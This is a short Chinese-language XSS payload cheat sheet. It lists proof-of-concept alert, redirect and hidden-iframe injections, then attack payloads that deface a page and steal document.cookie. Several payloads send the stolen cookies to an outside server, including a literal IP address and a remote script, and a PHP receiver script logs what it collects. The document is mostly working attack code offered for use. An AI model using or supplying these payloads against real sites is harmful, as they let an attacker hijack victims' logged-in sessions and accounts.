poc
- <script>alert('xss')</script> 最简单常用的poc
- <a href='' onclick=alert('xss')">type</a> 页面出现一个按钮type,点击触发onclick,然后执行弹窗
- <img src=http://1.1.1.1/a.ipg onerror=alert('xss')> 加载图片,给一个错误的图片地址,错误则执行弹窗
- <script>window.location=‘http://1.1.1.1'</script> 重定向到指定的url地址
- <iframe SRC="http://1.1.1.1/victim" height = "0" width ="0"></iframe>
exp
-
<script>document.body.innerHTML="<div style=visibility:visible;><h1>THIS
WEBSITE IS UNDER ATTACK</h1></div>";</script>- 篡改页面,将页面篡改为<h1></h1>里面显示的文字
-
<script>new Image().src="http://yourhost/getcookie.php?
cookie="+document.cookie;</script>- 将别人登录的cookie信息捕获到自己的服务器上
- 自己的服务器上编写一个接收cookie信息的php脚本getcookie.php
- 此脚本将接收到的cookie信息写入到自动创建的txt文本cookie.txt里面
- <script>document.location='http://47.99.184.173/getcookie.php?cookie='+document.cookie;</script>
- 与上一个获取cookie信息的payload相似,相当于这是第二种获取cookie信息的exp
- <script src=http://1.1.1.1/a.js></script>
- 自己服务器上a,js的源码为:
-
var img = new Image(); img.src = "http://1.1.1.1/cookies.php?cookie="+document.cookie;
- 获取cookie信息的第三种方式,这种方式的payload比较简短,便于很好的利用。
- 这种间接的方式,可以适用于所有的exp,将攻击代码放在服务器上的一个js文件里面,然后再漏洞点利用<script>访问
附上一个简短的getcookie.php脚本
<?php $cookie = $_GET['cookie']; $log = fopen("cookie.txt", "w"); fwrite($log, $cookie ."\n"); fclose($log); ?>